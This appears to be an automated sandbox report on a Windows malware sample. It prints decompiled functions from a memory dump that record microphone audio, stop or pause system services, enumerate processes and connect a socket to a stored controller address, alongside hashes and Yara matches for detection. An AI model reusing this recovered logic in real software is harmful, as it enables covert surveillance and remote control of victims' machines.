                                  • Instruction ID: 745551a8169cf10c7f688d11d93f95233c425957d6d772b9d422287574ec9151
                                  • Opcode Fuzzy Hash: aa66e4f5bf8f0b9d55fb22090a090fc99bfa328d692b576d190f675996a42e8d
                                  • Instruction Fuzzy Hash: 2D11A23160060DDBCB04FBA5DD5AAEE3778EB48304F008439F912A72E1EF785544CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040DBD7, Relevance: 12.0, APIs: 8, Instructions: 45COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 51%
                                  			E0040DBD7() {
				char* _t7;
				int _t8;
				char* _t9;
				int _t10;
				char* _t11;
				void* _t33;
				void* _t40;

				 *0x41b1f8 = 0;
				_t7 = E0040180C(_t33 - 0x10, 0, 2);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t8 = atoi(_t7);
				_t9 = E0040180C(_t33 - 0x10, 0, 1);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t10 = atoi(_t9);
				_t11 = E0040180C(_t33 - 0x10, 0, 0);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				E004010CE(_t40, atoi(_t11), _t10, _t8);
				E004017DD(_t33 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}










                                  0x0040dbde
                                  0x0040dbe4
                                  0x0040dbeb
                                  0x0040dbf8
                                  0x0040dc01
                                  0x0040dc08
                                  0x0040dc0f
                                  0x0040dc17
                                  0x0040dc1e
                                  0x0040dc29
                                  0x0040e6a4
                                  0x0040e6ac
                                  0x0040e6b5
                                  0x0040e6c1

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040DBEB
                                  • atoi.MSVCRT ref: 0040DBF8
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040DC08
                                  • atoi.MSVCRT ref: 0040DC0F
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040DC1E
                                  • atoi.MSVCRT ref: 0040DC25
                                    • Part of subcall function 004010CE: _ftol.MSVCRT ref: 00401134
                                    • Part of subcall function 004010CE: waveInOpen.WINMM(0041B198,000000FF,Function_0001B218,0040122D,00000000,00030008), ref: 0040115E
                                    • Part of subcall function 004010CE: waveInStart.WINMM ref: 00401177
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@atoi$??1?$basic_string@wave$OpenStart_ftol
                                  • String ID:
                                  • API String ID: 463581448-0
                                  • Opcode ID: e8abcc86fd1f763814c7dcc41e9978dcc5a8fc80e57baa885fa6e4d5f9deb451
                                  • Instruction ID: c3a8f3133f02346e86bcb6311be1634d36dcbe797283f91724418690e0411b93
                                  • Opcode Fuzzy Hash: e8abcc86fd1f763814c7dcc41e9978dcc5a8fc80e57baa885fa6e4d5f9deb451
                                  • Instruction Fuzzy Hash: 1D01FF72E00218DFDB04BBF1EC599ED7764EB90356B00483EE512E71E1EEB85904CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411859, Relevance: 12.0, APIs: 8, Instructions: 44serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00411859(void* _a4) {
				struct _SERVICE_STATUS _v32;
				short* _t6;
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x40);
				_t18 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t17 = OpenServiceW(_t18, _t6, 0x40);
				if(_t17 != 0) {
					_t14 = 0 | ControlService(_t17, 2,  &_v32) != 0x00000000;
					CloseServiceHandle(_t18);
					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t14;
			}








                                  0x00411862
                                  0x00411868
                                  0x00411873
                                  0x00411875
                                  0x00411883
                                  0x00411887
                                  0x004118a8
                                  0x004118ab
                                  0x004118ae
                                  0x00411889
                                  0x0041188a
                                  0x0041188a
                                  0x004118b3
                                  0x004118bf

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,0041B310,?,?,?,?,?,?,?,004111F9), ref: 00411868
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,004111F9), ref: 00411875
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,004111F9), ref: 0041187D
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 0041188A
                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,?,004111F9), ref: 00411899
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 004118AB
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 004118AE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004111F9), ref: 004118B3
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                  • String ID:
                                  • API String ID: 858787766-0
                                  • Opcode ID: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                  • Instruction ID: 456a524f7c11b696f934a25de41654fa22df35ab19f263cd8204020f404e56b2
                                  • Opcode Fuzzy Hash: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                  • Instruction Fuzzy Hash: 39F04471510518EFD3107FB4AC89EFF3F6CDF89790B448025FA0692150D7749D468AE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004118C0, Relevance: 12.0, APIs: 8, Instructions: 44serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E004118C0(void* _a4) {
				struct _SERVICE_STATUS _v32;
				short* _t6;
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x40);
				_t18 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t17 = OpenServiceW(_t18, _t6, 0x40);
				if(_t17 != 0) {
					_t14 = 0 | ControlService(_t17, 3,  &_v32) != 0x00000000;
					CloseServiceHandle(_t18);
					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t14;
			}








                                  0x004118c9
                                  0x004118cf
                                  0x004118da
                                  0x004118dc
                                  0x004118ea
                                  0x004118ee
                                  0x0041190f
                                  0x00411912
                                  0x00411915
                                  0x004118f0
                                  0x004118f1
                                  0x004118f1
                                  0x0041191a
                                  0x00411926

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,0041B310,?,?,?,?,?,?,?,00411168), ref: 004118CF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,00411168), ref: 004118DC
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00411168), ref: 004118E4
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 004118F1
                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,?,00411168), ref: 00411900
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 00411912
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 00411915
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00411168), ref: 0041191A
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                  • String ID:
                                  • API String ID: 858787766-0
                                  • Opcode ID: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                  • Instruction ID: 16193dc10f2cd34b32417e23f1564050492aa2af447f1f1bdc9e6cf5e8b33254
                                  • Opcode Fuzzy Hash: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                  • Instruction Fuzzy Hash: D7F04471510518EFD7106FB4EC88DEF3F6CDF89750B444025FA0692150DB749E458AE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411760, Relevance: 12.0, APIs: 8, Instructions: 44serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00411760(void* _a4) {
				struct _SERVICE_STATUS _v32;
				short* _t6;
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x20);
				_t18 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t17 = OpenServiceW(_t18, _t6, 0x20);
				if(_t17 != 0) {
					_t14 = 0 | ControlService(_t17, 1,  &_v32) != 0x00000000;
					CloseServiceHandle(_t18);
					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t14;
			}








                                  0x00411769
                                  0x0041176f
                                  0x0041177a
                                  0x0041177c
                                  0x0041178a
                                  0x0041178e
                                  0x004117af
                                  0x004117b2
                                  0x004117b5
                                  0x00411790
                                  0x00411791
                                  0x00411791
                                  0x004117ba
                                  0x004117c6

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,0041B310,?,?,?,?,?,?,?,00411280), ref: 0041176F
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000020,?,?,?,?,?,?,?,00411280), ref: 0041177C
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00411280), ref: 00411784
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 00411791
                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,00411280), ref: 004117A0
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 004117B2
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 004117B5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00411280), ref: 004117BA
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                  • String ID:
                                  • API String ID: 858787766-0
                                  • Opcode ID: f8fd2a6c5f299153eb193c66ec477f5c61babc6e911454b5a8d4cefe462bdfda
                                  • Instruction ID: b89de82e4dcd107d12e5f2e386de490b738cfb46e6195f9b9e1884d6b0831d1c
                                  • Opcode Fuzzy Hash: f8fd2a6c5f299153eb193c66ec477f5c61babc6e911454b5a8d4cefe462bdfda
                                  • Instruction Fuzzy Hash: 23F0AF71100618EFD3106FB4AC88EFF3F6CEF89390B044025FA06921A0DB648D468AE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D761, Relevance: 12.0, APIs: 8, Instructions: 44COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 43%
                                  			E0040D761(void* __ecx, void* __eflags) {
				void* _t15;
				void* _t20;
				void* _t30;
				void* _t32;
				void* _t34;
				void* _t38;

				_t38 = __eflags;
				_t20 = __ecx;
				__imp___itoa(GetCurrentProcessId(), _t32 - 0x30, 0xa);
				_t15 = _t32 - 0x60;
				L00414140();
				L00414170();
				E004020C2(0x41be70, 0x4f, _t34);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t15, _t15, E00409EAA(_t38, _t32 - 0x150), _t30, _t32 - 0x30, _t20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				E004017DD(_t32 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}









                                  0x0040d761
                                  0x0040d761
                                  0x0040d76e
                                  0x0040d78a
                                  0x0040d78e
                                  0x0040d798
                                  0x0040d7a7
                                  0x0040d7af
                                  0x0040e69b
                                  0x0040e6a4
                                  0x0040e6ac
                                  0x0040e6b5
                                  0x0040e6c1

                                  APIs
                                  • GetCurrentProcessId.KERNEL32(?,0000000A), ref: 0040D767
                                  • _itoa.MSVCRT ref: 0040D76E
                                    • Part of subcall function 00409EAA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409EBB
                                    • Part of subcall function 00409EAA: CreateToolhelp32Snapshot.KERNEL32 ref: 00409ECF
                                    • Part of subcall function 00409EAA: Process32FirstW.KERNEL32(00000000,?), ref: 00409EF0
                                    • Part of subcall function 00409EAA: Process32NextW.KERNEL32(00000000,0000022C), ref: 00409EFD
                                    • Part of subcall function 00409EAA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00000000,0000022C,00000000,?,00000002,00000000), ref: 00409F1E
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409F99
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FA9
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FB6
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4), ref: 00409FC6
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004166F4,00000000), ref: 00409FD3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?), ref: 0040D78E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040D798
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004F), ref: 0040D7AF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E69B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@0@D@2@@std@@Hstd@@V?$basic_string@$??1?$basic_string@$V10@0@$??0?$basic_string@V10@$Process32$CreateCurrentD@1@@FirstG@1@@G@2@@std@@G@std@@NextProcessSnapshotToolhelp32V01@@_itoa
                                  • String ID:
                                  • API String ID: 1707565870-0
                                  • Opcode ID: dd4241b6f18d58bf00a5beda7eae8558aaf4a1e159d760b7b3d5e3117157614c
                                  • Instruction ID: 286f1569ef994b2bf272d8202e8d00d479d3e157814ab9f0be6f7aa08cfd563f
                                  • Opcode Fuzzy Hash: dd4241b6f18d58bf00a5beda7eae8558aaf4a1e159d760b7b3d5e3117157614c
                                  • Instruction Fuzzy Hash: CD01217291021CEBCB05ABE1EC4DDEE7738FBA4306F00443AF506A7091EB745949CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041230A, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90sleeplibraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 50%
                                  			E0041230A(void* __ecx, intOrPtr __edx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v44;
				char _v52;
				char _v60;
				char _v68;
				char _v76;
				char _v84;
				void* _t39;
				void* _t41;
				void* _t45;
				void* _t50;
				void* _t54;
				intOrPtr _t56;
				intOrPtr* _t59;

				_t56 = __edx;
				_t54 = __ecx;
				_t59 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetSystemTimes");
				 *_t59( &_v44,  &_v60,  &_v76);
				Sleep(0x3e8);
				 *_t59( &_v52,  &_v68,  &_v84);
				_v28 = E004123EE(_t54,  &_v44);
				_v24 = _t56;
				_v20 = E004123EE(_t54,  &_v52);
				_v16 = _t56;
				_t39 = E004123EE(_t54,  &_v60);
				_v32 = _t56;
				_t41 = E004123EE(_t54,  &_v68);
				_v12 = E004123EE(_t54,  &_v76);
				asm("sbb edi, [ebp-0x1c]");
				_v8 = _t56;
				_v32 = _t56;
				_t45 = E004123EE(_t54,  &_v84);
				asm("sbb edi, [ebp-0x4]");
				asm("sbb ecx, [ebp-0xc]");
				asm("adc ecx, [ebp-0x1c]");
				asm("adc ecx, [ebp-0x14]");
				_t50 = E00413F70(_t45 - _v12 - _v20 + _t41 - _t39 + _v28, _t56, 0x64, 0);
				asm("adc edi, [ebp-0x1c]");
				return E00413F00(_t50, _t56, _t45 - _v12 + _t41 - _t39, _t56);
			}























                                  0x0041230a
                                  0x0041230a
                                  0x0041232a
                                  0x00412338
                                  0x0041233f
                                  0x00412351
                                  0x0041235c
                                  0x00412363
                                  0x0041236b
                                  0x00412372
                                  0x00412375
                                  0x00412380
                                  0x00412383
                                  0x00412397
                                  0x0041239a
                                  0x004123a1
                                  0x004123a6
                                  0x004123a9
                                  0x004123bc
                                  0x004123c6
                                  0x004123cb
                                  0x004123d1
                                  0x004123d6
                                  0x004123dd
                                  0x004123ed

                                  APIs
                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,0041B320), ref: 0041231D
                                  • GetProcAddress.KERNEL32(00000000), ref: 00412324
                                  • Sleep.KERNEL32(000003E8,?,0041B320), ref: 0041233F
                                  • __aulldiv.LIBCMT ref: 004123E4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressHandleModuleProcSleep__aulldiv
                                  • String ID: GetSystemTimes$kernel32.dll
                                  • API String ID: 482274533-1354958348
                                  • Opcode ID: 46a1d328fedf844ba606f0e8673ace6c540685b211b4bcf1c735d680270a1030
                                  • Instruction ID: 24784d85835a85e8dafa53e59313101cf39276f4ebe332ff0eed9d8e085b34e9
                                  • Opcode Fuzzy Hash: 46a1d328fedf844ba606f0e8673ace6c540685b211b4bcf1c735d680270a1030
                                  • Instruction Fuzzy Hash: 9231CD72D0021DABCB10EBF5CD85DEFBBBCAE48714F04412AF515F3245D678A6498BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410E53, Relevance: 10.6, APIs: 7, Instructions: 64COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 24%
                                  			E00410E53(void* __eflags, char _a4) {
				char _v20;
				char _v36;
				char _v52;
				void* _t16;
				char* _t18;
				void* _t19;
				void* _t36;

				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z();
				E00402038(0x41c130);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				E0040209B(0x41c130,  &_a4);
				_t16 = E00412855(0x41c130,  &_v36, E004113C9( &_v52));
				_t18 =  &_v20;
				L00414140();
				L00414140();
				_t19 = E004020C2(0x41c130, 0x34, _t36 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t18, _t18,  &_a4, 0x41b310, _t16, 0x41c130);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				E00402118(0x41c130, E00410F04);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t19;
			}










                                  0x00410e65
                                  0x00410e72
                                  0x00410e83
                                  0x00410e84
                                  0x00410e85
                                  0x00410e86
                                  0x00410e87
                                  0x00410e9a
                                  0x00410eac
                                  0x00410eb0
                                  0x00410eba
                                  0x00410ec6
                                  0x00410ed0
                                  0x00410ed9
                                  0x00410ee2
                                  0x00410eef
                                  0x00410ef7
                                  0x00410f03

                                  APIs
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00410E65
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                    • Part of subcall function 004113C9: OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 004113D9
                                    • Part of subcall function 004113C9: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004113F2
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,00000000,?,?,00000000,?), ref: 00410EB0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,?), ref: 00410EBA
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000034,?,?,?,?,00000000,?), ref: 00410ED0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410ED9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410EE2
                                    • Part of subcall function 00402118: CreateThread.KERNEL32(00000000,00000000,00402137,?,00000000,00000000), ref: 0040212D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410EF7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@$D@2@@0@Hstd@@V01@@V10@0@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@CreateD@1@@G@1@@ManagerOpenThreadV01@connectsocket
                                  • String ID:
                                  • API String ID: 2339118965-0
                                  • Opcode ID: 86e22a700adb0c7821cfbfe26678e24a00dc881542be09655b9efe58bdae1695
                                  • Instruction ID: 1193976e1187dff15876f75262123416920ecc17f0a83cfc990a5670802f72a4
                                  • Opcode Fuzzy Hash: 86e22a700adb0c7821cfbfe26678e24a00dc881542be09655b9efe58bdae1695
                                  • Instruction Fuzzy Hash: 1811A772A0021CA7CB00FBA1EC4ACEF776CEA84344704443EFE02E7191DA785948C7E8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412881, Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 43%
                                  			E00412881(void* __eax, intOrPtr _a4, void* _a8, char _a11) {
				char _v20;
				void* _t15;
				void* _t18;
				signed int _t20;
				void* _t25;
				signed int _t28;
				signed int _t29;
				signed int _t36;
				void* _t46;
				signed int _t57;
				void* _t58;

				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				_t57 = __eax + 2;
				_t15 = _t57 + _t57;
				L00413E84();
				_t25 = _t15;
				_t28 = _t57;
				_t46 = _t25;
				_t29 = _t28 >> 2;
				_t18 = memset(_t46 + _t29, memset(_t46, 0, _t29 << 2), (_t28 & 0x00000003) << 0);
				_t6 = _t57 - 2; // 0x0
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t15);
				_t58 = _t18;
				_t36 = _t6 >> 2;
				_t20 = memcpy(_t25, _t58, _t36 << 2);
				memcpy(_t58 + _t36 + _t36, _t58, _t20 & 0x00000003);
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t25,  &_a11);
				L00413EBE();
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z( &_v20, _t25);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _a4;
			}














                                  0x0041288d
